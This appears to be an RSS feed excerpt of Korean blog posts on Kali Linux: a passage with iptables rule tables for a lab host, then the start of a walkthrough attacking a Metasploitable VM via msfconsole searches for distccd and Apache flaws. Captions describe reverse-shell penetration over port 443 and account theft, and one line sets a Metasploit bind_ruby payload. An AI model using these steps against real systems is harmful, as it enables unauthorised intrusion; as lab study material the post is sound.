&lt;td style=&quot;width: 16.6667%; height: 17px; text-align: center;&quot;&gt;Destination&lt;/td&gt;
&lt;td style=&quot;width: 16.6667%; height: 17px; text-align: center;&quot;&gt;protocol&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 32.2867%; height: 17px; text-align: center;&quot;&gt;ssh ( tcp, 22)&lt;/td&gt;
&lt;td style=&quot;width: 34.3799%; height: 17px; text-align: center;&quot;&gt;192.168.0.0/24&lt;/td&gt;
&lt;td style=&quot;width: 16.6667%; height: 17px; text-align: center;&quot;&gt;192.168.0.23&lt;/td&gt;
&lt;td style=&quot;width: 16.6667%; height: 17px; text-align: center;&quot;&gt;tcp, 80&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 32.2867%; height: 17px; text-align: center;&quot;&gt;http ( tcp, 80)&lt;/td&gt;
&lt;td style=&quot;width: 34.3799%; height: 17px; text-align: center;&quot;&gt;any(0.0.0.0/0)&lt;/td&gt;
&lt;td style=&quot;width: 16.6667%; height: 17px; text-align: center;&quot;&gt;192.168.0.23&lt;/td&gt;
&lt;td style=&quot;width: 16.6667%; height: 17px; text-align: center;&quot;&gt;tcp, 80&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;height: 17px;&quot;&gt;
&lt;td style=&quot;width: 32.2867%; height: 17px; text-align: center;&quot;&gt;irc ( tcp, 6667)&lt;/td&gt;
&lt;td style=&quot;width: 34.3799%; height: 17px; text-align: center;&quot;&gt;any(0.0.0.0/0)&lt;/td&gt;
&lt;td style=&quot;width: 16.6667%; height: 17px; text-align: center;&quot;&gt;192.168.0.23&lt;/td&gt;
&lt;td style=&quot;width: 16.6667%; height: 17px; text-align: center;&quot;&gt;tcp, 6667&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;948&quot; data-origin-height=&quot;305&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dAt6WN/btrYMYPVQbp/NUq2Skem6VJI3M7jOZg4OK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dAt6WN/btrYMYPVQbp/NUq2Skem6VJI3M7jOZg4OK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dAt6WN/btrYMYPVQbp/NUq2Skem6VJI3M7jOZg4OK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdAt6WN%2FbtrYMYPVQbp%2FNUq2Skem6VJI3M7jOZg4OK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;948&quot; height=&quot;305&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;948&quot; data-origin-height=&quot;305&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;686&quot; data-origin-height=&quot;276&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cfNT59/btrYIUOPOAd/TdxwkW59W05ZThpMw5VsYK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cfNT59/btrYIUOPOAd/TdxwkW59W05ZThpMw5VsYK/img.png&quot; data-alt=&quot;tcp port 추가와 DROP 정책으로 변경&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cfNT59/btrYIUOPOAd/TdxwkW59W05ZThpMw5VsYK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcfNT59%2FbtrYIUOPOAd%2FTdxwkW59W05ZThpMw5VsYK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;686&quot; height=&quot;276&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;686&quot; data-origin-height=&quot;276&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;tcp port 추가와 DROP 정책으로 변경&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;581&quot; data-origin-height=&quot;130&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/c8hxGh/btrYMX4txZf/udiLSttfmCkDtcHDVQCZQk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/c8hxGh/btrYMX4txZf/udiLSttfmCkDtcHDVQCZQk/img.png&quot; data-alt=&quot;DROP 정책으로 PING이 되지 않는다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/c8hxGh/btrYMX4txZf/udiLSttfmCkDtcHDVQCZQk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc8hxGh%2FbtrYMX4txZf%2FudiLSttfmCkDtcHDVQCZQk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;581&quot; height=&quot;130&quot; data-origin-width=&quot;581&quot; data-origin-height=&quot;130&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;DROP 정책으로 PING이 되지 않는다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/Kz8mz/btrYIcJfa5B/8uMDYejGZIndpubUf8OKrk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/Kz8mz/btrYIcJfa5B/8uMDYejGZIndpubUf8OKrk/img.png&quot; data-origin-width=&quot;674&quot; data-origin-height=&quot;268&quot; data-is-animation=&quot;false&quot; data-widthpercent=&quot;45.78&quot; data-filename=&quot;blob&quot; style=&quot;width: 45.2446%; margin-right: 10px;&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/Kz8mz/btrYIcJfa5B/8uMDYejGZIndpubUf8OKrk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FKz8mz%2FbtrYIcJfa5B%2F8uMDYejGZIndpubUf8OKrk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;674&quot; height=&quot;268&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bTNUHc/btrYG6WFh1q/C24KQt6EBxZrHX1OaWmjt1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bTNUHc/btrYG6WFh1q/C24KQt6EBxZrHX1OaWmjt1/img.png&quot; data-origin-width=&quot;566&quot; data-origin-height=&quot;190&quot; data-is-animation=&quot;false&quot; style=&quot;width: 53.5926%;&quot; data-widthpercent=&quot;54.22&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bTNUHc/btrYG6WFh1q/C24KQt6EBxZrHX1OaWmjt1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbTNUHc%2FbtrYG6WFh1q%2FC24KQt6EBxZrHX1OaWmjt1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;566&quot; height=&quot;190&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
  &lt;figcaption&gt;icmp 프로토콜을 accept해주면 ping이 보내 진다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;715&quot; data-origin-height=&quot;287&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bxERDf/btrYMQdhzJA/iSh7lFNiKHtiIrABZdW4CK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bxERDf/btrYMQdhzJA/iSh7lFNiKHtiIrABZdW4CK/img.png&quot; data-alt=&quot;OUTPUT으로 내보낸적이 있던것은 유지 하겠다는 설정&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bxERDf/btrYMQdhzJA/iSh7lFNiKHtiIrABZdW4CK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbxERDf%2FbtrYMQdhzJA%2FiSh7lFNiKHtiIrABZdW4CK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;715&quot; height=&quot;287&quot; data-filename=&quot;blob&quot; data-origin-width=&quot;715&quot; data-origin-height=&quot;287&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;OUTPUT으로 내보낸적이 있던것은 유지 하겠다는 설정&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;902&quot; data-origin-height=&quot;301&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/drilVh/btrYGuXyZEP/khh4YMYiXY1ogT4K8eGaCK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/drilVh/btrYGuXyZEP/khh4YMYiXY1ogT4K8eGaCK/img.png&quot; data-alt=&quot;iptables의 INPUT DROP 설정으로 6667포트를 뚫고 침투할수가 없어 연결이 되지 않는 것을 확인 할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/drilVh/btrYGuXyZEP/khh4YMYiXY1ogT4K8eGaCK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdrilVh%2FbtrYGuXyZEP%2Fkhh4YMYiXY1ogT4K8eGaCK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;902&quot; height=&quot;301&quot; data-origin-width=&quot;902&quot; data-origin-height=&quot;301&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;iptables의 INPUT DROP 설정으로 6667포트를 뚫고 침투할수가 없어 연결이 되지 않는 것을 확인 할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;904&quot; data-origin-height=&quot;400&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/JIzsn/btrYINozgVA/IegNyVUprJZOKPFy8yKsBk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/JIzsn/btrYINozgVA/IegNyVUprJZOKPFy8yKsBk/img.png&quot; data-alt=&quot;역방향으로 공격대상자가 공격자에게 익숙한 https포트인 443포트로 접근하게 하여 침투에 성공 하였다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/JIzsn/btrYINozgVA/IegNyVUprJZOKPFy8yKsBk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FJIzsn%2FbtrYINozgVA%2FIegNyVUprJZOKPFy8yKsBk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;904&quot; height=&quot;400&quot; data-origin-width=&quot;904&quot; data-origin-height=&quot;400&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;역방향으로 공격대상자가 공격자에게 익숙한 https포트인 443포트로 접근하게 하여 침투에 성공 하였다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;900&quot; data-origin-height=&quot;400&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bgXQ4H/btrYIv9BUFM/du9kkBN7UMo0hLgwSgITZk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bgXQ4H/btrYIv9BUFM/du9kkBN7UMo0hLgwSgITZk/img.png&quot; data-alt=&quot;공격대상 웹서버의 계정을 탈취하여 역방향 침투&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bgXQ4H/btrYIv9BUFM/du9kkBN7UMo0hLgwSgITZk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbgXQ4H%2FbtrYIv9BUFM%2Fdu9kkBN7UMo0hLgwSgITZk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;900&quot; height=&quot;400&quot; data-origin-width=&quot;900&quot; data-origin-height=&quot;400&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격대상 웹서버의 계정을 탈취하여 역방향 침투&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;OUTPUT(outgoing) ACCEP&lt;/b&gt;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;ssh ( tcp, 22)&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;192.168.0.23&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;http ( tcp, 80)&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;192.168.0.23&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;irc ( tcp, 6667)&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;192.168.0.23&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Kali Linux</category>
      <author>Pulseeee</author>
      <guid isPermaLink="true">https://it-mandarine.tistory.com/71</guid>
      <comments>https://it-mandarine.tistory.com/71#entry71comment</comments>
      <pubDate>Fri, 10 Feb 2023 11:24:17 +0900</pubDate>
    </item>
    <item>
      <title>유닉스/리눅스 기반의 운영체제 침투</title>
      <link>https://it-mandarine.tistory.com/70</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;유닉스/리눅스&amp;nbsp;기반의&amp;nbsp;운영체제&amp;nbsp;침투 &lt;br /&gt;&lt;br /&gt;Kali Linux&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;-&amp;gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Metasploitable &lt;br /&gt;&lt;br /&gt;ms02-058&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;Microsoft 2002-058 &lt;br /&gt;cve-2xxx-xxxx&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Global Application 2xxx-xxxx&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignLeft&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;530&quot; data-origin-height=&quot;22&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/48aNx/btrYARcT6xv/aLnqG4CJT8hMIEXkHq6V20/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/48aNx/btrYARcT6xv/aLnqG4CJT8hMIEXkHq6V20/img.png&quot; data-alt=&quot;취약점이 발견된 것을 cve-2xxx-xxxx 형태로&amp;amp;amp;nbsp; (cve_2022_33891) 작성된다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/48aNx/btrYARcT6xv/aLnqG4CJT8hMIEXkHq6V20/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F48aNx%2FbtrYARcT6xv%2FaLnqG4CJT8hMIEXkHq6V20%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;530&quot; height=&quot;22&quot; data-origin-width=&quot;530&quot; data-origin-height=&quot;22&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;취약점이 발견된 것을 cve-2xxx-xxxx 형태로&amp;amp;nbsp; (cve_2022_33891) 작성된다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;osvdb&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;OpenSource&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;938&quot; data-origin-height=&quot;704&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/veHcl/btrYzleTo6P/QFBbzZ0k94OAkrM3zIAAN1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/veHcl/btrYzleTo6P/QFBbzZ0k94OAkrM3zIAAN1/img.png&quot; data-alt=&quot;mfconsole에서 search 명령어를 이용하여 apache의 취약점을 확인할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/veHcl/btrYzleTo6P/QFBbzZ0k94OAkrM3zIAAN1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FveHcl%2FbtrYzleTo6P%2FQFBbzZ0k94OAkrM3zIAAN1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;938&quot; height=&quot;704&quot; data-origin-width=&quot;938&quot; data-origin-height=&quot;704&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;mfconsole에서 search 명령어를 이용하여 apache의 취약점을 확인할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;814&quot; data-origin-height=&quot;386&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/cmisuT/btrYAP7e3qX/IXgig1KZakbGIaPm4dMFs0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/cmisuT/btrYAP7e3qX/IXgig1KZakbGIaPm4dMFs0/img.png&quot; data-alt=&quot;search ip로 해당 ip를 사용하는 pc의 스캔 결과를 알수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/cmisuT/btrYAP7e3qX/IXgig1KZakbGIaPm4dMFs0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FcmisuT%2FbtrYAP7e3qX%2FIXgig1KZakbGIaPm4dMFs0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;814&quot; height=&quot;386&quot; data-origin-width=&quot;814&quot; data-origin-height=&quot;386&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;search ip로 해당 ip를 사용하는 pc의 스캔 결과를 알수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;구분&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;운영체제 종류&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;IP&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;비고&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;공격 대상자&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;메타스플로잇터블 2.8&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;192.168.0.23&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;게스트 OS&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;공격자&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;칼리 리눅스 2022.4&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;1925.168.0.29&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;게스트 OS&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;965&quot; data-origin-height=&quot;269&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bn4daT/btrYDeZBrOc/oEKS8P2zF66P1KqgnMbhD1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bn4daT/btrYDeZBrOc/oEKS8P2zF66P1KqgnMbhD1/img.png&quot; data-alt=&quot;포트가 닫혀 있는 것을 ICMP가 알려준다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bn4daT/btrYDeZBrOc/oEKS8P2zF66P1KqgnMbhD1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbn4daT%2FbtrYDeZBrOc%2FoEKS8P2zF66P1KqgnMbhD1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;965&quot; height=&quot;269&quot; data-origin-width=&quot;965&quot; data-origin-height=&quot;269&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;포트가 닫혀 있는 것을 ICMP가 알려준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;944&quot; data-origin-height=&quot;213&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdJLCE/btrYChPHU0K/XkYkNzpmxK16c8W74Da7s1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdJLCE/btrYChPHU0K/XkYkNzpmxK16c8W74Da7s1/img.png&quot; data-alt=&quot;개방되어있는 distccd에대해 search명령어로 취약점을 확인한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdJLCE/btrYChPHU0K/XkYkNzpmxK16c8W74Da7s1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbdJLCE%2FbtrYChPHU0K%2FXkYkNzpmxK16c8W74Da7s1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;944&quot; height=&quot;213&quot; data-origin-width=&quot;944&quot; data-origin-height=&quot;213&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;개방되어있는 distccd에대해 search명령어로 취약점을 확인한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;exploit은 취약점을 뚫고 들어가는것이고 / payload는 뚫고 들어가서 악성코드를 심는 것이다.&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;set payload cmd/unix/&lt;span style=&quot;color: #ee2323;&quot;&gt;bind_ruby&lt;/span&gt; (방화벽이 열려있을때 사용)&lt;/b&gt;&lt;/p&gt;
